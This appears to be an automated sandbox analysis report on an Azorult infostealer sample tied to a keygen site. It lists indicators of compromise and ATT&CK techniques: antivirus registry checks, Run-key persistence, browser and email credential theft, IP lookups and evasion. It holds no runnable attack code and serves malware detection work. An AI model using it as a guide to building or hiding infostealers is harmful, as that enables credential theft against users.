azorult | hxxps://keygenninja[.]com/

System Information Discovery

Processes:

setups.tmpsetup.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	setup.exe

Loads dropped DLL 26 IoCs

Processes:

setups.tmpFD3D.tmp.exeSetup3310.tmpe2c4myx2qb2.tmpvict.tmpvpn.tmplayawhdydqp.exeIBInstaller_97039.tmp

pid	process
844	setups.tmp
844	setups.tmp
844	setups.tmp
844	setups.tmp
844	setups.tmp
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
1832	FD3D.tmp.exe
5152	Setup3310.tmp
5152	Setup3310.tmp
5184	e2c4myx2qb2.tmp
5272	vict.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5580	vpn.tmp
5736	layawhdydqp.exe
5848	IBInstaller_97039.tmp

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

8296 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
8296	icacls.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/7416-812-0x0000000000400000-0x0000000000FE1000-memory.dmp	themida

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

multitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hwntnv0ckju = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\2JG3OIROEB\\multitimer.exe\" 1 3.1616869295.605f77af35bb3"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 53 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\FRISK Software\F-PROT Antivirus for Windows	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\KasperskyLab	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\ESET\NOD	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 1 IoCs

Processes:

askinstall20.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\colgdlijdieibnaccfdcdbpdffofkfeb\6.37.18_0\manifest.json	askinstall20.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 16 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
664	ipinfo.io
668	ipinfo.io
722	api.2ip.ua
723	api.2ip.ua
773	checkip.amazonaws.com
357	checkip.amazonaws.com
409	ip-api.com
291	checkip.amazonaws.com
728	checkip.amazonaws.com
297	ip-api.com
601	checkip.amazonaws.com
231	ipinfo.io
235	ipinfo.io
770	api.2ip.ua
685	ipinfo.io
749	checkip.amazonaws.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe

Drops file in Program Files directory 64 IoCs

Processes:

IBInstaller_97039.tmpvpn.tmpe2c4myx2qb2.tmpvict.tmp

description	ioc	process
File created	C:\Program Files (x86)\InstallationEngineForIB\is-FS9QA.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-OOBBE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-BF71L.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-SV4IM.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Data.Entity.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-A5N9H.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Delphi.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-KCILN.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-90GDC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-HF306.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7FUR1.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\viewerise\WeriseTweaker.exe	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-KVNSE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-CFF8E.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-EFDLE.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\am805.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\tunnle.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-N912P.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\jxpiinstall.exe	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-HHNKA.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-E4VIN.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-Q8PR1.tmp	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-G9OPM.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-CTF07.tmp	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\MaskVPN\is-G4H73.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-4NSR3.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-T2AR5.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-EPHEC.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-CLT7H.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-7E0D1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-V4IUQ.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\ipseccmd.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-4GI2P.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-DGG39.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-V5JBF.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-9CEFK.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-IIOR9.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\is-DF4UO.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libCommon.dll	vpn.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-CJ4KA.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\viewerise\is-QQRB2.tmp	e2c4myx2qb2.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\Borland.Studio.Refactoring.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win732\is-23PJ3.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-S357D.tmp	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins001.dat	vict.tmp
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\unins000.dat	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-O9AJG.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\InstallationEngineForIB\System.Web.Extensions.Design.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\InstallationEngineForIB\is-NCEVV.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6UQ3T.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-6V8TE.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-EKQA1.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-2LG1A.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\libMaskVPN.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	e2c4myx2qb2.tmp
File created	C:\Program Files (x86)\MaskVPN\is-B3N7F.tmp	vpn.tmp

Drops file in Windows directory 3 IoCs

Processes:

MicrosoftEdge.exemultitimer.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 26 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5400	5520	WerFault.exe	winlthsth.exe
5352	5412	WerFault.exe	s3jzz2sspe0.exe
5280	5412	WerFault.exe	s3jzz2sspe0.exe
5936	5412	WerFault.exe	s3jzz2sspe0.exe
3716	5412	WerFault.exe	s3jzz2sspe0.exe
5320	5412	WerFault.exe	s3jzz2sspe0.exe
6328	5412	WerFault.exe	s3jzz2sspe0.exe
5752	5412	WerFault.exe	s3jzz2sspe0.exe
6552	5412	WerFault.exe	s3jzz2sspe0.exe
5712	5412	WerFault.exe	s3jzz2sspe0.exe
3424	7360	WerFault.exe	qyyxvoqvedl.exe
3648	7360	WerFault.exe	qyyxvoqvedl.exe
4628	2032	WerFault.exe	sczfhdica0k.exe
5364	7360	WerFault.exe	qyyxvoqvedl.exe
5236	2032	WerFault.exe	sczfhdica0k.exe
4324	2032	WerFault.exe	sczfhdica0k.exe
8080	7360	WerFault.exe	qyyxvoqvedl.exe
6868	2032	WerFault.exe	sczfhdica0k.exe
7508	7360	WerFault.exe	qyyxvoqvedl.exe
6084	7360	WerFault.exe	qyyxvoqvedl.exe
5192	2032	WerFault.exe	sczfhdica0k.exe
8364	2032	WerFault.exe	sczfhdica0k.exe
8832	7360	WerFault.exe	qyyxvoqvedl.exe
9172	7360	WerFault.exe	qyyxvoqvedl.exe
8232	2032	WerFault.exe	sczfhdica0k.exe
3284	2032	WerFault.exe	sczfhdica0k.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

msinfo32.exemsinfo32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	msinfo32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	msinfo32.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

492 schtasks.exe
6780 schtasks.exe
3828 schtasks.exe
6216 schtasks.exe
7228 schtasks.exe
Delays execution with timeout.exe 7 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

9496 timeout.exe
10040 timeout.exe
8748 timeout.exe
632 timeout.exe
4876 timeout.exe
7784 timeout.exe
7716 timeout.exe

pid	process
492	schtasks.exe
6780	schtasks.exe
3828	schtasks.exe
6216	schtasks.exe
7228	schtasks.exe

pid	process
9496	timeout.exe
10040	timeout.exe
8748	timeout.exe
632	timeout.exe
4876	timeout.exe
7784	timeout.exe
7716	timeout.exe

Enumerates system info in registry 2 TTPs 11 IoCs

Query Registry

System Information Discovery

Processes:

msinfo32.exexcopy.exemsinfo32.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMinorRelease	msinfo32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease	msinfo32.exe

GoLang User-Agent 2 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 581 Go-http-client/1.1
HTTP User-Agent header 603 Go-http-client/1.1
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2252 taskkill.exe
6080 taskkill.exe
7748 taskkill.exe
3712 taskkill.exe
9768 taskkill.exe

description	flow	ioc
HTTP User-Agent header	581	Go-http-client/1.1
HTTP User-Agent header	603	Go-http-client/1.1

pid	process
2252	taskkill.exe
6080	taskkill.exe
7748	taskkill.exe
3712	taskkill.exe
9768	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeschtasks.exechrome.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "7k0n1e6"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{D0B14F05-15A1-44BE-8CDC-A4EDBAB8093D} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
